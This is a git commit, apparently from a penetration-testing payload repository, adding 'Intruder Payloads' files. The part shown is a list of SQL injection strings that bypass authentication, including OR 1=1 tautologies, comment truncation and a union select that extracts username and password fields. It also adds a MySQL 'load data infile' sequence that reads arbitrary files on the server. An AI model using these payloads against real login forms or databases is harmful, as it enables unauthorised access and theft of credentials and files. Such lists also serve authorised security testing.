Intruder Payloads

Add Intruder Payloads
This commit is contained in:
İsmail Taşdelen
2019-11-17 12:12:18 +03:00
parent 40f1a6e9c5
commit b46bb6652c
23 changed files with 1559 additions and 0 deletions

View File

@@ -0,0 +1,5 @@
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--

View File

@@ -0,0 +1 @@
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;